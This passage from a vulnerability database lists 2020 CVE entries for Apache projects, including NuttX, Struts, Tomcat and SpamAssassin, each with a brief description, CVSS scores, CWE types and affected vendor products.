Out-of-bounds Write vulnerability in the TCP stack of Apache NuttX (incubating) versions up to and including 9.1.0 and 10.0.0 allows an attacker to corrupt memory by supplying arbitrary urgent data pointer offsets within TCP packets, including offsets beyond the length of the packet.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,CWE-787,

Products Affected

Vendor Product Version
apache nuttx 10.0.0
apache nuttx *
CVE-2020-17529 MEDIUM

Out-of-bounds Write vulnerability in the TCP stack of Apache NuttX (incubating) versions up to and including 9.1.0 and 10.0.0 allows an attacker to corrupt memory by supplying an invalid fragmentation offset value in the IP header. This only impacts builds with both the CONFIG_EXPERIMENTAL and CONFIG_NET_TCP_REASSEMBLY build flags enabled.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,CWE-787,

Products Affected

Vendor Product Version
apache nuttx 10.0.0
apache nuttx *
CVE-2020-17530 HIGH

Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software: Apache Struts 2.0.0 - Struts 2.5.25.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-917,CWE-917,

Products Affected

Vendor Product Version
apache struts *
oracle mysql_enterprise_monitor 8.0.23
oracle communications_policy_management 12.5.0
oracle communications_diameter_intelligence_hub 8.0.0
oracle communications_diameter_intelligence_hub 8.2.0
oracle financial_services_data_integration_hub 8.0.6
oracle business_intelligence 12.2.1.4.0
oracle financial_services_data_integration_hub 8.0.3
oracle communications_pricing_design_center 12.0.0.3.0
oracle hospitality_opera_5 5.6
oracle communications_diameter_intelligence_hub 8.2.3
oracle business_intelligence 12.2.1.3.0
oracle communications_diameter_intelligence_hub 8.1.0
CVE-2020-17531 HIGH

A Java Serialization vulnerability was found in Apache Tapestry 4. Apache Tapestry 4 will attempt to deserialize the "sp" parameter even before invoking the page's validate method, leading to deserialization without authentication. Apache Tapestry 4 reached end of life in 2008 and no update to address this issue will be released. Apache Tapestry 5 versions are not vulnerable to this issue. Users of Apache Tapestry 4 should upgrade to the latest Apache Tapestry 5 version.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2020-17532 MEDIUM

When the handler-router component is enabled in servicecomb-java-chassis, an authenticated user may inject some data and cause arbitrary code execution. The problem affects versions 2.0.0 through 2.1.3 and is fixed in Apache ServiceComb-Java-Chassis 2.1.5.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-502,

Products Affected

Vendor Product Version
apache java_chassis *
CVE-2020-17533 MEDIUM

Apache Accumulo versions 1.5.0 through 1.10.0 and version 2.0.0 do not properly check the return value of some policy enforcement functions before permitting an authenticated user to perform certain administrative operations. Specifically, the return values of the 'canFlush' and 'canPerformSystemActions' security functions are not checked in some instances, therefore allowing an authenticated user with insufficient permissions to perform the following actions: flushing a table, shutting down Accumulo or an individual tablet server, and setting or removing system-wide Accumulo configuration properties.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H 2.8 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-252,CWE-252,

Products Affected

Vendor Product Version
apache accumulo *
apache accumulo 2.0.0
CVE-2020-17534 MEDIUM

There exists a race condition between the deletion of the temporary file and the creation of the temporary directory in `webkit` subproject of HTML/Java API version 1.7. A similar vulnerability has recently been disclosed in other Java projects and the fix in HTML/Java API version 1.7.1 follows theirs: To avoid local privilege escalation version 1.7.1 creates the temporary directory atomically without dealing with the temporary file: https://github.com/apache/netbeans-html4j/commit/fa70e507e5555e1adb4f6518479fc408a7abd0e6

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache html/java_api 1.7
CVE-2020-1925 MEDIUM

Apache Olingo versions 4.0.0 to 4.7.0 provide the AsyncRequestWrapperImpl class, which reads a URL from the Location header and then sends a GET or DELETE request to this URL. This may allow an SSRF attack: if an attacker tricks a client into connecting to a malicious server, that server can make the client request any URL, including internal resources that are not directly accessible to the attacker.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache olingo *
CVE-2020-1926 MEDIUM

Apache Hive cookie signature verification used a non-constant-time comparison, which is known to be vulnerable to timing attacks. This could allow recovery of another user's cookie signature. The issue was addressed in Apache Hive 2.3.8.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-208,CWE-203,

Products Affected

Vendor Product Version
apache hive *
CVE-2020-1927 MEDIUM

In Apache HTTP Server 2.4.0 to 2.4.41, redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-601,

Products Affected

Vendor Product Version
apache http_server *
oracle instantis_enterprisetrack *
canonical ubuntu_linux 18.04
oracle communications_session_route_manager 8.1.1
opensuse leap 15.1
broadcom brocade_fabric_operating_system -
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0.0
oracle communications_session_report_manager 8.2.1
fedoraproject fedora 32
oracle communications_element_manager 8.1.1
oracle communications_session_report_manager 8.2.0
oracle communications_element_manager 8.2.1
oracle zfs_storage_appliance_kit 8.8
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
netapp oncommand_unified_manager_core_package -
debian debian_linux 9.0
oracle sd-wan_aware 8.2
oracle communications_session_report_manager 8.1.1
oracle communications_element_manager 8.2.0
canonical ubuntu_linux 16.04
fedoraproject fedora 31
canonical ubuntu_linux 20.04
CVE-2020-1928 MEDIUM

An information disclosure vulnerability was found in Apache NiFi 1.10.0. The sensitive parameter parser would log parsed values for debugging purposes. This would expose literal values entered in a sensitive property when no parameter was present.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache nifi 1.10.0
CVE-2020-1929 MEDIUM

The Apache Beam MongoDB connector in versions 2.10.0 to 2.16.0 has an option to disable SSL trust verification. However, this configuration is not respected, and the certificate verification disables trust verification in every case. This exclusion also gets registered globally, which disables trust checking for any code running in the same JVM.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache beam *
CVE-2020-1930 HIGH

A command execution issue was found in Apache SpamAssassin prior to 3.4.3. Carefully crafted nefarious rule configuration (.cf) files can be configured to run system commands, similar to CVE-2018-11805. With this bug unpatched, exploits can be injected in a number of scenarios and run with the same privileges as spamd, which may be elevated, though doing so remotely is difficult. In addition to upgrading to SA 3.4.4, we again recommend that users should only use update channels or third-party .cf files from trusted places. If you cannot upgrade, do not use third-party rulesets, do not use sa-compile and do not run spamd as an account with elevated privileges.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache spamassassin *
CVE-2020-1931 HIGH

A command execution issue was found in Apache SpamAssassin prior to 3.4.3. Carefully crafted nefarious configuration (.cf) files can be configured to run system commands, similar to CVE-2018-11805. This issue is less stealthy, and attempts to exploit it will throw warnings. Thanks to Damian Lukowski at credativ for reporting the issue ethically. With this bug unpatched, exploits can be injected in a number of scenarios, though doing so remotely is difficult. In addition to upgrading to SA 3.4.4, we again recommend that users should only use update channels or third-party .cf files from trusted places.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache spamassassin *
CVE-2020-1932 MEDIUM

An information disclosure issue was found in Apache Superset 0.34.0, 0.34.1, 0.35.0, and 0.35.1. Authenticated Apache Superset users are able to retrieve other users' information, including hashed passwords, by accessing an unused and undocumented API endpoint on Apache Superset.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache superset 0.35.1
apache superset 0.34.1
apache superset 0.35.0
apache superset 0.34.0
CVE-2020-1933 MEDIUM

An XSS vulnerability was found in Apache NiFi 1.0.0 to 1.10.0. Malicious scripts could be injected into the UI through an action by an unaware authenticated user in Firefox. This did not appear to occur in other browsers.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-1934 MEDIUM

In Apache HTTP Server 2.4.0 to 2.4.41, mod_proxy_ftp may use uninitialized memory when proxying to a malicious FTP server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-908,

Products Affected

Vendor Product Version
apache http_server *
oracle instantis_enterprisetrack *
canonical ubuntu_linux 18.04
oracle communications_session_route_manager 8.1.1
debian debian_linux 9.0
opensuse leap 15.1
oracle communications_session_report_manager 8.1.1
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0.0
oracle communications_element_manager 8.2.0
oracle communications_session_report_manager 8.2.1
fedoraproject fedora 32
oracle communications_element_manager 8.1.1
oracle communications_session_report_manager 8.2.0
canonical ubuntu_linux 16.04
fedoraproject fedora 31
canonical ubuntu_linux 20.04
oracle communications_element_manager 8.2.1
oracle zfs_storage_appliance_kit 8.8
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
CVE-2020-1935 MEDIUM

In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N 2.2 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
oracle agile_product_lifecycle_management 9.3.6
opensuse leap 15.1
oracle workload_manager 18c
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle hospitality_guest_access 4.2.1
oracle workload_manager 12.2.0.1
apache tomcat *
oracle communications_element_manager 8.1.1
oracle health_sciences_empirica_signal 7.3.3
netapp data_availability_services -
oracle mysql_enterprise_monitor *
oracle communications_element_manager 8.2.1
oracle hospitality_guest_access 4.2.0
netapp oncommand_system_manager *
oracle health_sciences_empirica_inspections 1.0.1.2
oracle retail_order_broker 15.0
oracle agile_product_lifecycle_management 9.3.3
oracle siebel_ui_framework *
oracle hyperion_infrastructure_technology 11.1.2.4
debian debian_linux 9.0
oracle workload_manager 19c
debian debian_linux 8.0
oracle communications_element_manager 8.2.0
oracle transportation_management 6.3.7
oracle communications_instant_messaging_server 10.0.1.4.0
canonical ubuntu_linux 16.04
apache tomcat 9.0.0
oracle agile_product_lifecycle_management 9.3.5
CVE-2020-1936 MEDIUM

A cross-site scripting issue was found in Apache Ambari Views. This was addressed in Apache Ambari 2.7.4.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ambari *
CVE-2020-1937 MEDIUM

Kylin has some RESTful APIs which concatenate SQL with the user input string; a user is likely to be able to run malicious database queries.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache kylin 3.0.0
apache kylin *
CVE-2020-1938 HIGH

When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising.

In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed:

- returning arbitrary files from anywhere in the web application
- processing any file in the web application as a JSP

Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means), then this, along with the ability to process a file as a JSP, made remote code execution possible.

It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
opensuse leap 15.1
oracle workload_manager 18c
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle hospitality_guest_access 4.2.1
oracle workload_manager 12.2.0.1
apache tomcat *
fedoraproject fedora 32
oracle communications_element_manager 8.1.1
oracle agile_plm 9.3.3
oracle health_sciences_empirica_signal 7.3.3
netapp data_availability_services -
oracle agile_plm 9.3.5
blackberry workspaces_server 8.1.0
oracle agile_plm 9.3.6
oracle mysql_enterprise_monitor *
apache geode 1.12.0
oracle communications_element_manager 8.2.1
oracle hospitality_guest_access 4.2.0
netapp oncommand_system_manager *
oracle health_sciences_empirica_inspections 1.0.1.2
blackberry workspaces_server 7.1.2
oracle siebel_ui_framework *
debian debian_linux 9.0
blackberry good_control *
oracle workload_manager 19c
debian debian_linux 8.0
oracle communications_element_manager 8.2.0
oracle transportation_management 6.3.7
oracle communications_instant_messaging_server 10.0.1.4.0
blackberry workspaces_server 9.0
fedoraproject fedora 31
fedoraproject fedora 30
blackberry workspaces_server 7.0.1
CVE-2020-1939 MEDIUM

The Apache NuttX (Incubating) project provides an optional separate "apps" repository which contains various optional components and example programs. One of these, ftpd, had a NULL pointer dereference bug. The NuttX RTOS itself is not affected. Users of the optional apps repository are affected only if they have enabled ftpd. Versions 6.15 to 8.2 are affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache nuttx *
CVE-2020-1940 MEDIUM

The optional initial password change and password expiration features present in Apache Jackrabbit Oak 1.2.0 to 1.22.0 are prone to a sensitive information disclosure vulnerability. The code mandates the changed password to be passed as an additional attribute to the credentials object but does not remove it upon processing during the first phase of the authentication. In combination with additional, independent authentication mechanisms, this may lead to the new password being disclosed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-212,

Products Affected

Vendor Product Version
apache jackrabbit_oak *
CVE-2020-1941 MEDIUM

In Apache ActiveMQ 5.0.0 to 5.15.11, the webconsole admin GUI is open to XSS, in the view that lists the contents of a queue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
oracle communications_session_route_manager 8.1.1
oracle enterprise_repository 11.1.1.7.0
apache activemq *
oracle communications_session_report_manager 8.1.1
oracle communications_diameter_signaling_router *
oracle communications_element_manager 8.2.0
oracle communications_session_report_manager 8.2.1
oracle communications_element_manager 8.1.1
oracle communications_session_report_manager 8.2.0
oracle communications_element_manager 8.2.1
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
CVE-2020-1942 MEDIUM

In Apache NiFi 0.0.1 to 1.11.0, the flow fingerprint factory generated flow fingerprints which included sensitive property descriptor values. In the event a node attempted to join a cluster and the cluster flow was not inheritable, the flow fingerprint of both the cluster and local flow was printed, potentially containing sensitive values in plaintext.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-1943 MEDIUM

Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2020-1944 HIGH

There is a request smuggling vulnerability in Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.8, and 8.0.0 to 8.0.5 involving the Transfer-Encoding and Content-Length headers. Upgrade to versions 7.1.9 and 8.0.6 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2020-1945 LOW

Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.3 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N 1.0 5.2

CVSS 2.0

Severity: LOW

Problem Type: CWE-668,

Products Affected

Vendor Product Version
oracle retail_financial_integration 16.0.3.0
oracle retail_financial_integration 16.0
oracle agile_engineering_data_management 6.2.1.0
oracle retail_financial_integration 15.0.4.0
oracle retail_store_inventory_management 14.1.3
oracle enterprise_manager_ops_center 12.4.0.0
oracle retail_bulk_data_integration 19.0.1
oracle utilities_framework 4.4.0.0.0
oracle retail_bulk_data_integration 16.0.3.0
oracle retail_central_office 14.1
oracle retail_predictive_application_server 16.0.3
oracle primavera_unifier *
oracle retail_xstore_point_of_service 18.0.3
oracle retail_xstore_point_of_service 16.0.6
oracle retail_merchandising_system 19.0.1
oracle retail_replenishment_optimization 15.0.3
oracle retail_returns_management 14.1
oracle retail_assortment_planning 16.0.3
oracle retail_back_office 14.0
oracle primavera_unifier 16.1
oracle retail_assortment_planning 15.0.3
oracle banking_enterprise_collections *
oracle retail_extract_transform_and_load 13.2.8
oracle retail_predictive_application_server 16.0.3.0
oracle retail_central_office 14.0
oracle retail_xstore_point_of_service 15.0.4
oracle utilities_framework 2.2.0.0.0
oracle utilities_framework 4.2.0.2.0
oracle communications_order_and_service_management 7.3
oracle retail_store_inventory_management 14.1
oracle endeca_information_discovery_studio 3.2.0
oracle retail_service_backbone 16.0
oracle retail_merchandise_financial_planning 15.0.3
oracle retail_back_office 14.1
oracle retail_data_extractor_for_merchandising 1.9
oracle retail_regular_price_optimization 16.0.3
canonical ubuntu_linux 19.10
oracle retail_store_inventory_management 15.0.3
oracle retail_integration_bus 16.0
oracle retail_integration_bus 16.0.3.0
oracle communications_metasolv_solution 6.3.0
oracle banking_liquidity_management *
oracle timesten_in-memory_database *
oracle retail_data_extractor_for_merchandising 1.10
oracle communications_order_and_service_management 7.4
oracle retail_item_planning 15.0.3
oracle retail_integration_bus 14.1.3.2
oracle communications_diameter_signaling_router *
oracle real-time_decision_server 3.2.1.0
oracle primavera_unifier 16.2
oracle retail_predictive_application_server 14.1.3
oracle retail_size_profile_optimization 15.0.3
oracle retail_point-of-service 16.0
oracle flexcube_private_banking 12.0.0
oracle retail_store_inventory_management 16.0.3
oracle retail_extract_transform_and_load 13.2.5
oracle retail_predictive_application_server 15.0.3
oracle health_sciences_information_manager *
oracle retail_point-of-service 15.0
oracle retail_store_inventory_management 14.0.4
oracle retail_integration_bus 15.0.4.0
oracle retail_financial_integration 15.0
fedoraproject fedora 31
oracle rapid_planning 12.2
oracle retail_service_backbone 19.0.1.0
oracle retail_returns_management 14.0
oracle business_process_management_suite 12.2.1.3.0
oracle retail_regular_price_optimization 15.0.3
oracle retail_bulk_data_integration 16.0
oracle retail_bulk_data_integration 15.0
oracle data_integrator 12.2.1.4.0
oracle flexcube_investor_servicing 12.3.0
oracle primavera_gateway *
oracle flexcube_investor_servicing 12.4.0
oracle retail_store_inventory_management 16.0
oracle utilities_framework 4.2.0.3.0
oracle timesten_in-memory_database 11.2.2.8.49
oracle retail_integration_bus 19.0.1.0
oracle retail_predictive_application_server 14.0.3
oracle retail_advanced_inventory_planning 14.1
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle retail_point-of-service 14.0
oracle communications_asap 7.3
oracle flexcube_investor_servicing 14.1.0
oracle primavera_unifier 19.12
oracle retail_advanced_inventory_planning 16.0
oracle retail_advanced_inventory_planning 15.0
oracle flexcube_investor_servicing 14.0.0
oracle flexcube_private_banking 12.1.0
oracle utilities_framework 4.4.0.2.0
oracle retail_financial_integration 14.1.3.2
oracle enterprise_repository 11.1.1.7.0
oracle financial_services_analytical_applications_infrastructure *
apache ant *
oracle retail_service_backbone 16.0.3.0
fedoraproject fedora 32
oracle retail_service_backbone 15.0
oracle utilities_framework *
oracle rapid_planning 12.1
oracle retail_store_inventory_management 15.0
oracle retail_service_backbone 15.0.4.0
opensuse leap 15.2
oracle banking_platform *
oracle retail_integration_bus 14.1
oracle retail_xstore_point_of_service 19.0.2
oracle flexcube_investor_servicing 12.1.0
oracle business_process_management_suite 12.2.1.4.0
oracle retail_integration_bus 15.0
oracle retail_point-of-service 14.1
oracle retail_service_backbone 14.1.3.2
oracle data_integrator 12.2.1.3.0
oracle category_management_planning_&_optimization 15.0.3
oracle retail_macro_space_optimization 15.0.3
oracle retail_size_profile_optimization 16.0.3
CVE-2020-1946 HIGH

In Apache SpamAssassin before 3.4.5, malicious rule configuration (.cf) files can be configured to run system commands without any output or errors. With this, exploits can be injected in a number of scenarios. In addition to upgrading to SA version 3.4.5, users should only use update channels or third-party .cf files from trusted places.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
fedoraproject fedora 32
apache spamassassin *
fedoraproject fedora 34
debian debian_linux 9.0
debian debian_linux 10.0
fedoraproject fedora 33
CVE-2020-1947 HIGH

In Apache ShardingSphere (incubator) 4.0.0-RC3 and 4.0.0, the ShardingSphere web console uses the SnakeYAML library to parse YAML inputs when loading datasource configuration. SnakeYAML allows data to be unmarshalled to a Java type by using a YAML tag. Unmarshalling untrusted data can lead to remote code execution (RCE).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache shardingsphere 4.0.0
CVE-2020-1948 HIGH

This vulnerability affects all Dubbo users on version 2.7.6 or lower. An attacker can send RPC requests with an unrecognized service name or method name along with malicious parameter payloads. When the malicious parameter is deserialized, it will execute malicious code.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2020-1949 MEDIUM

Scripts in Sling CMS before 0.16.0 do not properly escape the Sling Selector from URLs when generating navigational elements for the administrative consoles and are vulnerable to reflected XSS attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache sling_cms *
CVE-2020-1950 MEDIUM

A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser in versions 1.0-1.23.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
canonical ubuntu_linux 16.04
apache tika *
oracle communications_messaging_server 8.1
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle communications_messaging_server 8.0.2
debian debian_linux 8.0
oracle business_process_management_suite 12.2.1.4.0
CVE-2020-1951 MEDIUM

A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser in versions 1.0-1.23.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
canonical ubuntu_linux 16.04
apache tika *
oracle communications_messaging_server 8.1
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle communications_messaging_server 8.0.2
debian debian_linux 8.0
oracle business_process_management_suite 12.2.1.4.0
CVE-2020-1952 HIGH

An issue was found in Apache IoTDB 0.9.0 to 0.9.1 and 0.8.0 to 0.8.2. When starting IoTDB, the JMX port 31999 is exposed with no certification. Then, clients could execute code remotely.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache iotdb *
CVE-2020-1953 HIGH

